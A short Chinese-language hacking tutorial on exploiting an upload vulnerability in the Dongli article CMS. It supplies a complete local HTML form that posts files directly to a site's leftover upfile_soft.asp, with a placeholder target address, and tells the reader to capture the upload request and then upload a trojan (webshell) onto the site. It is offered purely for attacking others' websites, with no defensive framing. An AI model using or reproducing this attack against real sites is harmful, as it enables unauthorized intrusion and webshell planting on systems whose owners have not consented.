动力文章上传漏洞的本地利用

最近盛行动力文章上传漏洞，不少网站纷纷关闭了上传功能，但一些网站并没有删除上传文件：upfile_soft.asp

这就给本地利用创造了机会，我们可以在本地构造一个上传页面，将上传地址直接指向网站的upfile_soft.asp文件。

构造的本地upfile.htm源程序如下：

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<style type="text/css">
<!--
BODY{
BACKGROUND-COLOR: #E1F4EE;
font-size:9pt
}
.tx1 { height: 20px;font-size: 9pt; border: 1px solid; border-color: #000000; color: #0000FF}
-->
</style>

</head>
<body leftmargin="0" topmargin="0">
<form action=" http://www.xxx.com/upfile_soft.asp " method="post" name="form1" enctype="multipart/form-data">
<input name="FileName" type="FILE" class="tx1" size="40">
<input type="submit" name="Submit" value="上传" style="border:1px double rgb(88,88,88);font:9pt">
</form>
</body>
</html>

修改代码中相应的页面地址我们就可以重新进行上传抓包，继而上传我们的马儿！